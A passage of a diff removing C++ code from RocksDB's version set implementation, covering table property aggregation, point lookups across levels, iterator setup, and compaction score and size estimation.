-      storage_info_.GetOverlappingInputs(level, &k1, &k2, &files, -1, nullptr,
-                                         false);
-      for (const auto& file_meta : files) {
-        auto fname =
-            TableFileName(vset_->db_options_->db_paths,
-                          file_meta->fd.GetNumber(), file_meta->fd.GetPathId());
-        if (props->count(fname) == 0) {
-          // 1. If the table is already present in table cache, load table
-          // properties from there.
-          std::shared_ptr<const TableProperties> table_properties;
-          Status s = GetTableProperties(&table_properties, file_meta, &fname);
-          if (s.ok()) {
-            props->insert({fname, table_properties});
-          } else {
-            return s;
-          }
-        }
-      }
-    }
-  }
-
-  return Status::OK();
-}
-
-Status Version::GetAggregatedTableProperties(
-    std::shared_ptr<const TableProperties>* tp, int level) {
-  TablePropertiesCollection props;
-  Status s;
-  if (level < 0) {
-    s = GetPropertiesOfAllTables(&props);
-  } else {
-    s = GetPropertiesOfAllTables(&props, level);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  auto* new_tp = new TableProperties();
-  for (const auto& item : props) {
-    new_tp->Add(*item.second);
-  }
-  tp->reset(new_tp);
-  return Status::OK();
-}
-
-size_t Version::GetMemoryUsageByTableReaders() {
-  size_t total_usage = 0;
-  for (auto& file_level : storage_info_.level_files_brief_) {
-    for (size_t i = 0; i < file_level.num_files; i++) {
-      total_usage += cfd_->table_cache()->GetMemoryUsageByTableReader(
-          vset_->env_options_, cfd_->internal_comparator(),
-          file_level.files[i].fd);
-    }
-  }
-  return total_usage;
-}
-
-void Version::GetColumnFamilyMetaData(ColumnFamilyMetaData* cf_meta) {
-  assert(cf_meta);
-  assert(cfd_);
-
-  cf_meta->name = cfd_->GetName();
-  cf_meta->size = 0;
-  cf_meta->file_count = 0;
-  cf_meta->levels.clear();
-
-  auto* ioptions = cfd_->ioptions();
-  auto* vstorage = storage_info();
-
-  for (int level = 0; level < cfd_->NumberLevels(); level++) {
-    uint64_t level_size = 0;
-    cf_meta->file_count += vstorage->LevelFiles(level).size();
-    std::vector<SstFileMetaData> files;
-    for (const auto& file : vstorage->LevelFiles(level)) {
-      uint32_t path_id = file->fd.GetPathId();
-      std::string file_path;
-      if (path_id < ioptions->db_paths.size()) {
-        file_path = ioptions->db_paths[path_id].path;
-      } else {
-        assert(!ioptions->db_paths.empty());
-        file_path = ioptions->db_paths.back().path;
-      }
-      files.emplace_back(
-          MakeTableFileName("", file->fd.GetNumber()), file_path,
-          file->fd.GetFileSize(), file->smallest_seqno, file->largest_seqno,
-          file->smallest.user_key().ToString(),
-          file->largest.user_key().ToString(),
-          file->stats.num_reads_sampled.load(std::memory_order_relaxed),
-          file->being_compacted);
-      level_size += file->fd.GetFileSize();
-    }
-    cf_meta->levels.emplace_back(
-        level, level_size, std::move(files));
-    cf_meta->size += level_size;
-  }
-}
-
-
-uint64_t VersionStorageInfo::GetEstimatedActiveKeys() const {
-  // Estimation will be inaccurate when:
-  // (1) there exist merge keys
-  // (2) keys are directly overwritten
-  // (3) deletion on non-existing keys
-  // (4) low number of samples
-  if (current_num_samples_ == 0) {
-    return 0;
-  }
-
-  if (current_num_non_deletions_ <= current_num_deletions_) {
-    return 0;
-  }
-
-  uint64_t est = current_num_non_deletions_ - current_num_deletions_;
-
-  uint64_t file_count = 0;
-  for (int level = 0; level < num_levels_; ++level) {
-    file_count += files_[level].size();
-  }
-
-  if (current_num_samples_ < file_count) {
-    // casting to avoid overflowing
-    return
-      static_cast<uint64_t>(
-        (est * static_cast<double>(file_count) / current_num_samples_)
-      );
-  } else {
-    return est;
-  }
-}
-
-double VersionStorageInfo::GetEstimatedCompressionRatioAtLevel(
-    int level) const {
-  assert(level < num_levels_);
-  uint64_t sum_file_size_bytes = 0;
-  uint64_t sum_data_size_bytes = 0;
-  for (auto* file_meta : files_[level]) {
-    sum_file_size_bytes += file_meta->fd.GetFileSize();
-    sum_data_size_bytes += file_meta->raw_key_size + file_meta->raw_value_size;
-  }
-  if (sum_file_size_bytes == 0) {
-    return -1.0;
-  }
-  return static_cast<double>(sum_data_size_bytes) / sum_file_size_bytes;
-}
-
-void Version::AddIterators(const ReadOptions& read_options,
-                           const EnvOptions& soptions,
-                           MergeIteratorBuilder* merge_iter_builder,
-                           RangeDelAggregator* range_del_agg) {
-  assert(storage_info_.finalized_);
-
-  for (int level = 0; level < storage_info_.num_non_empty_levels(); level++) {
-    AddIteratorsForLevel(read_options, soptions, merge_iter_builder, level,
-                         range_del_agg);
-  }
-}
-
-void Version::AddIteratorsForLevel(const ReadOptions& read_options,
-                                   const EnvOptions& soptions,
-                                   MergeIteratorBuilder* merge_iter_builder,
-                                   int level,
-                                   RangeDelAggregator* range_del_agg) {
-  assert(storage_info_.finalized_);
-  if (level >= storage_info_.num_non_empty_levels()) {
-    // This is an empty level
-    return;
-  } else if (storage_info_.LevelFilesBrief(level).num_files == 0) {
-    // No files in this level
-    return;
-  }
-
-  bool should_sample = should_sample_file_read();
-
-  auto* arena = merge_iter_builder->GetArena();
-  if (level == 0) {
-    // Merge all level zero files together since they may overlap
-    for (size_t i = 0; i < storage_info_.LevelFilesBrief(0).num_files; i++) {
-      const auto& file = storage_info_.LevelFilesBrief(0).files[i];
-      merge_iter_builder->AddIterator(cfd_->table_cache()->NewIterator(
-          read_options, soptions, cfd_->internal_comparator(), file.fd,
-          range_del_agg, nullptr, cfd_->internal_stats()->GetFileReadHist(0),
-          false, arena, false /* skip_filters */, 0 /* level */));
-    }
-    if (should_sample) {
-      // Count ones for every L0 files. This is done per iterator creation
-      // rather than Seek(), while files in other levels are recored per seek.
-      // If users execute one range query per iterator, there may be some
-      // discrepancy here.
-      for (FileMetaData* meta : storage_info_.LevelFiles(0)) {
-        sample_file_read_inc(meta);
-      }
-    }
-  } else {
-    // For levels > 0, we can use a concatenating iterator that sequentially
-    // walks through the non-overlapping files in the level, opening them
-    // lazily.
-    auto* mem = arena->AllocateAligned(sizeof(LevelFileIteratorState));
-    auto* state = new (mem)
-        LevelFileIteratorState(cfd_->table_cache(), read_options, soptions,
-                               cfd_->internal_comparator(),
-                               cfd_->internal_stats()->GetFileReadHist(level),
-                               false /* for_compaction */,
-                               cfd_->ioptions()->prefix_extractor != nullptr,
-                               IsFilterSkipped(level), level, range_del_agg);
-    mem = arena->AllocateAligned(sizeof(LevelFileNumIterator));
-    auto* first_level_iter = new (mem) LevelFileNumIterator(
-        cfd_->internal_comparator(), &storage_info_.LevelFilesBrief(level),
-        should_sample_file_read());
-    merge_iter_builder->AddIterator(
-        NewTwoLevelIterator(state, first_level_iter, arena, false));
-  }
-}
-
-void Version::AddRangeDelIteratorsForLevel(
-    const ReadOptions& read_options, const EnvOptions& soptions, int level,
-    std::vector<InternalIterator*>* range_del_iters) {
-  range_del_iters->clear();
-  for (size_t i = 0; i < storage_info_.LevelFilesBrief(level).num_files; i++) {
-    const auto& file = storage_info_.LevelFilesBrief(level).files[i];
-    auto* range_del_iter = cfd_->table_cache()->NewRangeTombstoneIterator(
-        read_options, soptions, cfd_->internal_comparator(), file.fd,
-        cfd_->internal_stats()->GetFileReadHist(level),
-        false /* skip_filters */, level);
-    if (range_del_iter != nullptr) {
-      range_del_iters->push_back(range_del_iter);
-    }
-  }
-}
-
-VersionStorageInfo::VersionStorageInfo(
-    const InternalKeyComparator* internal_comparator,
-    const Comparator* user_comparator, int levels,
-    CompactionStyle compaction_style, VersionStorageInfo* ref_vstorage,
-    bool _force_consistency_checks)
-    : internal_comparator_(internal_comparator),
-      user_comparator_(user_comparator),
-      // cfd is nullptr if Version is dummy
-      num_levels_(levels),
-      num_non_empty_levels_(0),
-      file_indexer_(user_comparator),
-      compaction_style_(compaction_style),
-      files_(new std::vector<FileMetaData*>[num_levels_]),
-      base_level_(num_levels_ == 1 ? -1 : 1),
-      files_by_compaction_pri_(num_levels_),
-      level0_non_overlapping_(false),
-      next_file_to_compact_by_size_(num_levels_),
-      compaction_score_(num_levels_),
-      compaction_level_(num_levels_),
-      l0_delay_trigger_count_(0),
-      accumulated_file_size_(0),
-      accumulated_raw_key_size_(0),
-      accumulated_raw_value_size_(0),
-      accumulated_num_non_deletions_(0),
-      accumulated_num_deletions_(0),
-      current_num_non_deletions_(0),
-      current_num_deletions_(0),
-      current_num_samples_(0),
-      estimated_compaction_needed_bytes_(0),
-      finalized_(false),
-      force_consistency_checks_(_force_consistency_checks) {
-  if (ref_vstorage != nullptr) {
-    accumulated_file_size_ = ref_vstorage->accumulated_file_size_;
-    accumulated_raw_key_size_ = ref_vstorage->accumulated_raw_key_size_;
-    accumulated_raw_value_size_ = ref_vstorage->accumulated_raw_value_size_;
-    accumulated_num_non_deletions_ =
-        ref_vstorage->accumulated_num_non_deletions_;
-    accumulated_num_deletions_ = ref_vstorage->accumulated_num_deletions_;
-    current_num_non_deletions_ = ref_vstorage->current_num_non_deletions_;
-    current_num_deletions_ = ref_vstorage->current_num_deletions_;
-    current_num_samples_ = ref_vstorage->current_num_samples_;
-  }
-}
-
-Version::Version(ColumnFamilyData* column_family_data, VersionSet* vset,
-                 uint64_t version_number)
-    : env_(vset->env_),
-      cfd_(column_family_data),
-      info_log_((cfd_ == nullptr) ? nullptr : cfd_->ioptions()->info_log),
-      db_statistics_((cfd_ == nullptr) ? nullptr
-                                       : cfd_->ioptions()->statistics),
-      table_cache_((cfd_ == nullptr) ? nullptr : cfd_->table_cache()),
-      merge_operator_((cfd_ == nullptr) ? nullptr
-                                        : cfd_->ioptions()->merge_operator),
-      storage_info_(
-          (cfd_ == nullptr) ? nullptr : &cfd_->internal_comparator(),
-          (cfd_ == nullptr) ? nullptr : cfd_->user_comparator(),
-          cfd_ == nullptr ? 0 : cfd_->NumberLevels(),
-          cfd_ == nullptr ? kCompactionStyleLevel
-                          : cfd_->ioptions()->compaction_style,
-          (cfd_ == nullptr || cfd_->current() == nullptr)
-              ? nullptr
-              : cfd_->current()->storage_info(),
-          cfd_ == nullptr ? false : cfd_->ioptions()->force_consistency_checks),
-      vset_(vset),
-      next_(this),
-      prev_(this),
-      refs_(0),
-      version_number_(version_number) {}
-
-void Version::Get(const ReadOptions& read_options, const LookupKey& k,
-                  PinnableSlice* value, Status* status,
-                  MergeContext* merge_context,
-                  RangeDelAggregator* range_del_agg, bool* value_found,
-                  bool* key_exists, SequenceNumber* seq, bool* is_blob) {
-  Slice ikey = k.internal_key();
-  Slice user_key = k.user_key();
-
-  assert(status->ok() || status->IsMergeInProgress());
-
-  if (key_exists != nullptr) {
-    // will falsify below if not found
-    *key_exists = true;
-  }
-
-  PinnedIteratorsManager pinned_iters_mgr;
-  GetContext get_context(
-      user_comparator(), merge_operator_, info_log_, db_statistics_,
-      status->ok() ? GetContext::kNotFound : GetContext::kMerge, user_key,
-      value, value_found, merge_context, range_del_agg, this->env_, seq,
-      merge_operator_ ? &pinned_iters_mgr : nullptr, is_blob);
-
-  // Pin blocks that we read to hold merge operands
-  if (merge_operator_) {
-    pinned_iters_mgr.StartPinning();
-  }
-
-  FilePicker fp(
-      storage_info_.files_, user_key, ikey, &storage_info_.level_files_brief_,
-      storage_info_.num_non_empty_levels_, &storage_info_.file_indexer_,
-      user_comparator(), internal_comparator());
-  FdWithKeyRange* f = fp.GetNextFile();
-  while (f != nullptr) {
-    if (get_context.sample()) {
-      sample_file_read_inc(f->file_metadata);
-    }
-    *status = table_cache_->Get(
-        read_options, *internal_comparator(), f->fd, ikey, &get_context,
-        cfd_->internal_stats()->GetFileReadHist(fp.GetHitFileLevel()),
-        IsFilterSkipped(static_cast<int>(fp.GetHitFileLevel()),
-                        fp.IsHitFileLastInLevel()),
-        fp.GetCurrentLevel());
-    // TODO: examine the behavior for corrupted key
-    if (!status->ok()) {
-      return;
-    }
-
-    switch (get_context.State()) {
-      case GetContext::kNotFound:
-        // Keep searching in other files
-        break;
-      case GetContext::kFound:
-        if (fp.GetHitFileLevel() == 0) {
-          RecordTick(db_statistics_, GET_HIT_L0);
-        } else if (fp.GetHitFileLevel() == 1) {
-          RecordTick(db_statistics_, GET_HIT_L1);
-        } else if (fp.GetHitFileLevel() >= 2) {
-          RecordTick(db_statistics_, GET_HIT_L2_AND_UP);
-        }
-        return;
-      case GetContext::kDeleted:
-        // Use empty error message for speed
-        *status = Status::NotFound();
-        return;
-      case GetContext::kCorrupt:
-        *status = Status::Corruption("corrupted key for ", user_key);
-        return;
-      case GetContext::kMerge:
-        break;
-      case GetContext::kBlobIndex:
-        ROCKS_LOG_ERROR(info_log_, "Encounter unexpected blob index.");
-        *status = Status::NotSupported(
-            "Encounter unexpected blob index. Please open DB with "
-            "rocksdb::blob_db::BlobDB instead.");
-        return;
-    }
-    f = fp.GetNextFile();
-  }
-
-  if (GetContext::kMerge == get_context.State()) {
-    if (!merge_operator_) {
-      *status =  Status::InvalidArgument(
-          "merge_operator is not properly initialized.");
-      return;
-    }
-    // merge_operands are in saver and we hit the beginning of the key history
-    // do a final merge of nullptr and operands;
-    std::string* str_value = value != nullptr ? value->GetSelf() : nullptr;
-    *status = MergeHelper::TimedFullMerge(
-        merge_operator_, user_key, nullptr, merge_context->GetOperands(),
-        str_value, info_log_, db_statistics_, env_,
-        nullptr /* result_operand */, true);
-    if (LIKELY(value != nullptr)) {
-      value->PinSelf();
-    }
-  } else {
-    if (key_exists != nullptr) {
-      *key_exists = false;
-    }
-    *status = Status::NotFound(); // Use an empty error message for speed
-  }
-}
-
-bool Version::IsFilterSkipped(int level, bool is_file_last_in_level) {
-  // Reaching the bottom level implies misses at all upper levels, so we'll
-  // skip checking the filters when we predict a hit.
-  return cfd_->ioptions()->optimize_filters_for_hits &&
-         (level > 0 || is_file_last_in_level) &&
-         level == storage_info_.num_non_empty_levels() - 1;
-}
-
-void VersionStorageInfo::GenerateLevelFilesBrief() {
-  level_files_brief_.resize(num_non_empty_levels_);
-  for (int level = 0; level < num_non_empty_levels_; level++) {
-    DoGenerateLevelFilesBrief(
-        &level_files_brief_[level], files_[level], &arena_);
-  }
-}
-
-void Version::PrepareApply(
-    const MutableCFOptions& mutable_cf_options,
-    bool update_stats) {
-  UpdateAccumulatedStats(update_stats);
-  storage_info_.UpdateNumNonEmptyLevels();
-  storage_info_.CalculateBaseBytes(*cfd_->ioptions(), mutable_cf_options);
-  storage_info_.UpdateFilesByCompactionPri(cfd_->ioptions()->compaction_pri);
-  storage_info_.GenerateFileIndexer();
-  storage_info_.GenerateLevelFilesBrief();
-  storage_info_.GenerateLevel0NonOverlapping();
-}
-
-bool Version::MaybeInitializeFileMetaData(FileMetaData* file_meta) {
-  if (file_meta->init_stats_from_file ||
-      file_meta->compensated_file_size > 0) {
-    return false;
-  }
-  std::shared_ptr<const TableProperties> tp;
-  Status s = GetTableProperties(&tp, file_meta);
-  file_meta->init_stats_from_file = true;
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(vset_->db_options_->info_log,
-                    "Unable to load table properties for file %" PRIu64
-                    " --- %s\n",
-                    file_meta->fd.GetNumber(), s.ToString().c_str());
-    return false;
-  }
-  if (tp.get() == nullptr) return false;
-  file_meta->num_entries = tp->num_entries;
-  file_meta->num_deletions = GetDeletedKeys(tp->user_collected_properties);
-  file_meta->raw_value_size = tp->raw_value_size;
-  file_meta->raw_key_size = tp->raw_key_size;
-
-  return true;
-}
-
-void VersionStorageInfo::UpdateAccumulatedStats(FileMetaData* file_meta) {
-  assert(file_meta->init_stats_from_file);
-  accumulated_file_size_ += file_meta->fd.GetFileSize();
-  accumulated_raw_key_size_ += file_meta->raw_key_size;
-  accumulated_raw_value_size_ += file_meta->raw_value_size;
-  accumulated_num_non_deletions_ +=
-      file_meta->num_entries - file_meta->num_deletions;
-  accumulated_num_deletions_ += file_meta->num_deletions;
-
-  current_num_non_deletions_ +=
-      file_meta->num_entries - file_meta->num_deletions;
-  current_num_deletions_ += file_meta->num_deletions;
-  current_num_samples_++;
-}
-
-void VersionStorageInfo::RemoveCurrentStats(FileMetaData* file_meta) {
-  if (file_meta->init_stats_from_file) {
-    current_num_non_deletions_ -=
-        file_meta->num_entries - file_meta->num_deletions;
-    current_num_deletions_ -= file_meta->num_deletions;
-    current_num_samples_--;
-  }
-}
-
-void Version::UpdateAccumulatedStats(bool update_stats) {
-  if (update_stats) {
-    // maximum number of table properties loaded from files.
-    const int kMaxInitCount = 20;
-    int init_count = 0;
-    // here only the first kMaxInitCount files which haven't been
-    // initialized from file will be updated with num_deletions.
-    // The motivation here is to cap the maximum I/O per Version creation.
-    // The reason for choosing files from lower-level instead of higher-level
-    // is that such design is able to propagate the initialization from
-    // lower-level to higher-level:  When the num_deletions of lower-level
-    // files are updated, it will make the lower-level files have accurate
-    // compensated_file_size, making lower-level to higher-level compaction
-    // will be triggered, which creates higher-level files whose num_deletions
-    // will be updated here.
-    for (int level = 0;
-         level < storage_info_.num_levels_ && init_count < kMaxInitCount;
-         ++level) {
-      for (auto* file_meta : storage_info_.files_[level]) {
-        if (MaybeInitializeFileMetaData(file_meta)) {
-          // each FileMeta will be initialized only once.
-          storage_info_.UpdateAccumulatedStats(file_meta);
-          // when option "max_open_files" is -1, all the file metadata has
-          // already been read, so MaybeInitializeFileMetaData() won't incur
-          // any I/O cost. "max_open_files=-1" means that the table cache passed
-          // to the VersionSet and then to the ColumnFamilySet has a size of
-          // TableCache::kInfiniteCapacity
-          if (vset_->GetColumnFamilySet()->get_table_cache()->GetCapacity() ==
-              TableCache::kInfiniteCapacity) {
-            continue;
-          }
-          if (++init_count >= kMaxInitCount) {
-            break;
-          }
-        }
-      }
-    }
-    // In case all sampled-files contain only deletion entries, then we
-    // load the table-property of a file in higher-level to initialize
-    // that value.
-    for (int level = storage_info_.num_levels_ - 1;
-         storage_info_.accumulated_raw_value_size_ == 0 && level >= 0;
-         --level) {
-      for (int i = static_cast<int>(storage_info_.files_[level].size()) - 1;
-           storage_info_.accumulated_raw_value_size_ == 0 && i >= 0; --i) {
-        if (MaybeInitializeFileMetaData(storage_info_.files_[level][i])) {
-          storage_info_.UpdateAccumulatedStats(storage_info_.files_[level][i]);
-        }
-      }
-    }
-  }
-
-  storage_info_.ComputeCompensatedSizes();
-}
-
-void VersionStorageInfo::ComputeCompensatedSizes() {
-  static const int kDeletionWeightOnCompaction = 2;
-  uint64_t average_value_size = GetAverageValueSize();
-
-  // compute the compensated size
-  for (int level = 0; level < num_levels_; level++) {
-    for (auto* file_meta : files_[level]) {
-      // Here we only compute compensated_file_size for those file_meta
-      // which compensated_file_size is uninitialized (== 0). This is true only
-      // for files that have been created right now and no other thread has
-      // access to them. That's why we can safely mutate compensated_file_size.
-      if (file_meta->compensated_file_size == 0) {
-        file_meta->compensated_file_size = file_meta->fd.GetFileSize();
-        // Here we only boost the size of deletion entries of a file only
-        // when the number of deletion entries is greater than the number of
-        // non-deletion entries in the file.  The motivation here is that in
-        // a stable workload, the number of deletion entries should be roughly
-        // equal to the number of non-deletion entries.  If we compensate the
-        // size of deletion entries in a stable workload, the deletion
-        // compensation logic might introduce unwanted effet which changes the
-        // shape of LSM tree.
-        if (file_meta->num_deletions * 2 >= file_meta->num_entries) {
-          file_meta->compensated_file_size +=
-              (file_meta->num_deletions * 2 - file_meta->num_entries) *
-              average_value_size * kDeletionWeightOnCompaction;
-        }
-      }
-    }
-  }
-}
-
-int VersionStorageInfo::MaxInputLevel() const {
-  if (compaction_style_ == kCompactionStyleLevel) {
-    return num_levels() - 2;
-  }
-  return 0;
-}
-
-int VersionStorageInfo::MaxOutputLevel(bool allow_ingest_behind) const {
-  if (allow_ingest_behind) {
-    assert(num_levels() > 1);
-    return num_levels() - 2;
-  }
-  return num_levels() - 1;
-}
-
-void VersionStorageInfo::EstimateCompactionBytesNeeded(
-    const MutableCFOptions& mutable_cf_options) {
-  // Only implemented for level-based compaction
-  if (compaction_style_ != kCompactionStyleLevel) {
-    estimated_compaction_needed_bytes_ = 0;
-    return;
-  }
-
-  // Start from Level 0, if level 0 qualifies compaction to level 1,
-  // we estimate the size of compaction.
-  // Then we move on to the next level and see whether it qualifies compaction
-  // to the next level. The size of the level is estimated as the actual size
-  // on the level plus the input bytes from the previous level if there is any.
-  // If it exceeds, take the exceeded bytes as compaction input and add the size
-  // of the compaction size to tatal size.
-  // We keep doing it to Level 2, 3, etc, until the last level and return the
-  // accumulated bytes.
-
-  uint64_t bytes_compact_to_next_level = 0;
-  uint64_t level_size = 0;
-  for (auto* f : files_[0]) {
-    level_size += f->fd.GetFileSize();
-  }
-  // Level 0
-  bool level0_compact_triggered = false;
-  if (static_cast<int>(files_[0].size()) >=
-          mutable_cf_options.level0_file_num_compaction_trigger ||
-      level_size >= mutable_cf_options.max_bytes_for_level_base) {
-    level0_compact_triggered = true;
-    estimated_compaction_needed_bytes_ = level_size;
-    bytes_compact_to_next_level = level_size;
-  } else {
-    estimated_compaction_needed_bytes_ = 0;
-  }
-
-  // Level 1 and up.
-  uint64_t bytes_next_level = 0;
-  for (int level = base_level(); level <= MaxInputLevel(); level++) {
-    level_size = 0;
-    if (bytes_next_level > 0) {
-#ifndef NDEBUG
-      uint64_t level_size2 = 0;
-      for (auto* f : files_[level]) {
-        level_size2 += f->fd.GetFileSize();
-      }
-      assert(level_size2 == bytes_next_level);
-#endif
-      level_size = bytes_next_level;
-      bytes_next_level = 0;
-    } else {
-      for (auto* f : files_[level]) {
-        level_size += f->fd.GetFileSize();
-      }
-    }
-    if (level == base_level() && level0_compact_triggered) {
-      // Add base level size to compaction if level0 compaction triggered.
-      estimated_compaction_needed_bytes_ += level_size;
-    }
-    // Add size added by previous compaction
-    level_size += bytes_compact_to_next_level;
-    bytes_compact_to_next_level = 0;
-    uint64_t level_target = MaxBytesForLevel(level);
-    if (level_size > level_target) {
-      bytes_compact_to_next_level = level_size - level_target;
-      // Estimate the actual compaction fan-out ratio as size ratio between
-      // the two levels.
-
-      assert(bytes_next_level == 0);
-      if (level + 1 < num_levels_) {
-        for (auto* f : files_[level + 1]) {
-          bytes_next_level += f->fd.GetFileSize();
-        }
-      }
-      if (bytes_next_level > 0) {
-        assert(level_size > 0);
-        estimated_compaction_needed_bytes_ += static_cast<uint64_t>(
-            static_cast<double>(bytes_compact_to_next_level) *
-            (static_cast<double>(bytes_next_level) /
-                 static_cast<double>(level_size) +
-             1));
-      }
-    }
-  }
-}
-
-namespace {
-uint32_t GetExpiredTtlFilesCount(const ImmutableCFOptions& ioptions,
-                                 const std::vector<FileMetaData*>& files) {
-  uint32_t ttl_expired_files_count = 0;
-
-  int64_t _current_time;
-  auto status = ioptions.env->GetCurrentTime(&_current_time);
-  if (status.ok()) {
-    const uint64_t current_time = static_cast<uint64_t>(_current_time);
-    for (auto f : files) {
-      if (!f->being_compacted && f->fd.table_reader != nullptr &&
-          f->fd.table_reader->GetTableProperties() != nullptr) {
-        auto creation_time =
-            f->fd.table_reader->GetTableProperties()->creation_time;
-        if (creation_time > 0 &&
-            creation_time <
-                (current_time - ioptions.compaction_options_fifo.ttl)) {
-          ttl_expired_files_count++;
-        }
-      }
-    }
-  }
-  return ttl_expired_files_count;
-}
-}  // anonymous namespace
-
-void VersionStorageInfo::ComputeCompactionScore(
-    const ImmutableCFOptions& immutable_cf_options,
-    const MutableCFOptions& mutable_cf_options) {
-  for (int level = 0; level <= MaxInputLevel(); level++) {
-    double score;
-    if (level == 0) {
-      // We treat level-0 specially by bounding the number of files
-      // instead of number of bytes for two reasons:
-      //
-      // (1) With larger write-buffer sizes, it is nice not to do too
-      // many level-0 compactions.
-      //
-      // (2) The files in level-0 are merged on every read and
-      // therefore we wish to avoid too many files when the individual
-      // file size is small (perhaps because of a small write-buffer
-      // setting, or very high compression ratios, or lots of
-      // overwrites/deletions).
-      int num_sorted_runs = 0;
-      uint64_t total_size = 0;
-      for (auto* f : files_[level]) {
-        if (!f->being_compacted) {
-          total_size += f->compensated_file_size;
-          num_sorted_runs++;
-        }
-      }
-      if (compaction_style_ == kCompactionStyleUniversal) {
-        // For universal compaction, we use level0 score to indicate
-        // compaction score for the whole DB. Adding other levels as if
-        // they are L0 files.
-        for (int i = 1; i < num_levels(); i++) {
-          if (!files_[i].empty() && !files_[i][0]->being_compacted) {
-            num_sorted_runs++;
-          }
-        }
-      }
-
-      if (compaction_style_ == kCompactionStyleFIFO) {
-        score =
-            static_cast<double>(total_size) /
-            immutable_cf_options.compaction_options_fifo.max_table_files_size;
-        if (immutable_cf_options.compaction_options_fifo.allow_compaction) {
-          score = std::max(
-              static_cast<double>(num_sorted_runs) /
-                  mutable_cf_options.level0_file_num_compaction_trigger,
-              score);
-        }
-        if (immutable_cf_options.compaction_options_fifo.ttl > 0) {
-          score = std::max(static_cast<double>(GetExpiredTtlFilesCount(
-                               immutable_cf_options, files_[level])),
-                           score);
-        }
-
-      } else {
-        score = static_cast<double>(num_sorted_runs) /
-                mutable_cf_options.level0_file_num_compaction_trigger;
-        if (compaction_style_ == kCompactionStyleLevel && num_levels() > 1) {
-          // Level-based involves L0->L0 compactions that can lead to oversized
-          // L0 files. Take into account size as well to avoid later giant
-          // compactions to the base level.
-          score = std::max(
-              score, static_cast<double>(total_size) /
-                     mutable_cf_options.max_bytes_for_level_base);
-        }
-      }
-    } else {
-      // Compute the ratio of current size to size limit.
-      uint64_t level_bytes_no_compacting = 0;
-      for (auto f : files_[level]) {
-        if (!f->being_compacted) {
-          level_bytes_no_compacting += f->compensated_file_size;
-        }
-      }
-      score = static_cast<double>(level_bytes_no_compacting) /
-              MaxBytesForLevel(level);
-    }
-    compaction_level_[level] = level;
-    compaction_score_[level] = score;
-  }
-
-  // sort all the levels based on their score. Higher scores get listed
-  // first. Use bubble sort because the number of entries are small.
-  for (int i = 0; i < num_levels() - 2; i++) {
-    for (int j = i + 1; j < num_levels() - 1; j++) {
-      if (compaction_score_[i] < compaction_score_[j]) {
-        double score = compaction_score_[i];
-        int level = compaction_level_[i];
-        compaction_score_[i] = compaction_score_[j];
-        compaction_level_[i] = compaction_level_[j];
-        compaction_score_[j] = score;
-        compaction_level_[j] = level;
-      }
-    }
-  }
-  ComputeFilesMarkedForCompaction();
-  EstimateCompactionBytesNeeded(mutable_cf_options);
-}
-
-void VersionStorageInfo::ComputeFilesMarkedForCompaction() {
-  files_marked_for_compaction_.clear();
-  int last_qualify_level = 0;
-
-  // Do not include files from the last level with data
-  // If table properties collector suggests a file on the last level,
-  // we should not move it to a new level.
-  for (int level = num_levels() - 1; level >= 1; level--) {
-    if (!files_[level].empty()) {
-      last_qualify_level = level - 1;
-      break;
-    }
-  }
-
-  for (int level = 0; level <= last_qualify_level; level++) {
-    for (auto* f : files_[level]) {
-      if (!f->being_compacted && f->marked_for_compaction) {
-        files_marked_for_compaction_.emplace_back(level, f);
-      }
-    }
-  }
-}
-
-namespace {
-
-// used to sort files by size
-struct Fsize {
-  size_t index;
-  FileMetaData* file;
-};
-
-// Compator that is used to sort files based on their size
-// In normal mode: descending size
-bool CompareCompensatedSizeDescending(const Fsize& first, const Fsize& second) {
-  return (first.file->compensated_file_size >
-      second.file->compensated_file_size);
-}
-} // anonymous namespace
-
-void VersionStorageInfo::AddFile(int level, FileMetaData* f, Logger* info_log) {
-  auto* level_files = &files_[level];
-  // Must not overlap
-#ifndef NDEBUG
-  if (level > 0 && !level_files->empty() &&
-      internal_comparator_->Compare(
-          (*level_files)[level_files->size() - 1]->largest, f->smallest) >= 0) {
-    auto* f2 = (*level_files)[level_files->size() - 1];
-    if (info_log != nullptr) {
-      Error(info_log, "Adding new file %" PRIu64
-                      " range (%s, %s) to level %d but overlapping "
-                      "with existing file %" PRIu64 " %s %s",
-            f->fd.GetNumber(), f->smallest.DebugString(true).c_str(),
-            f->largest.DebugString(true).c_str(), level, f2->fd.GetNumber(),
-            f2->smallest.DebugString(true).c_str(),
-            f2->largest.DebugString(true).c_str());
-      LogFlush(info_log);
-    }
-    assert(false);
-  }
-#endif
-  f->refs++;
-  level_files->push_back(f);
-}
-
-// Version::PrepareApply() need to be called before calling the function, or
-// following functions called:
-// 1. UpdateNumNonEmptyLevels();
-// 2. CalculateBaseBytes();
-// 3. UpdateFilesByCompactionPri();
-// 4. GenerateFileIndexer();
-// 5. GenerateLevelFilesBrief();
-// 6. GenerateLevel0NonOverlapping();
-void VersionStorageInfo::SetFinalized() {
-  finalized_ = true;
-#ifndef NDEBUG
-  if (compaction_style_ != kCompactionStyleLevel) {
-    // Not level based compaction.
-    return;
-  }
-  assert(base_level_ < 0 || num_levels() == 1 ||
-         (base_level_ >= 1 && base_level_ < num_levels()));
-  // Verify all levels newer than base_level are empty except L0
-  for (int level = 1; level < base_level(); level++) {
-    assert(NumLevelBytes(level) == 0);
-  }
-  uint64_t max_bytes_prev_level = 0;
-  for (int level = base_level(); level < num_levels() - 1; level++) {
-    if (LevelFiles(level).size() == 0) {
-      continue;
-    }
-    assert(MaxBytesForLevel(level) >= max_bytes_prev_level);
-    max_bytes_prev_level = MaxBytesForLevel(level);
-  }
-  int num_empty_non_l0_level = 0;
-  for (int level = 0; level < num_levels(); level++) {
-    assert(LevelFiles(level).size() == 0 ||
-           LevelFiles(level).size() == LevelFilesBrief(level).num_files);
-    if (level > 0 && NumLevelBytes(level) > 0) {
-      num_empty_non_l0_level++;
-    }
-    if (LevelFiles(level).size() > 0) {
-      assert(level < num_non_empty_levels());
-    }
-  }
-  assert(compaction_level_.size() > 0);
-  assert(compaction_level_.size() == compaction_score_.size());
-#endif
-}
-
-void VersionStorageInfo::UpdateNumNonEmptyLevels() {
-  num_non_empty_levels_ = num_levels_;
-  for (int i = num_levels_ - 1; i >= 0; i--) {
-    if (files_[i].size() != 0) {
-      return;
-    } else {
-      num_non_empty_levels_ = i;
-    }
-  }
-}
-
-namespace {
-// Sort `temp` based on ratio of overlapping size over file size
-void SortFileByOverlappingRatio(
-    const InternalKeyComparator& icmp, const std::vector<FileMetaData*>& files,
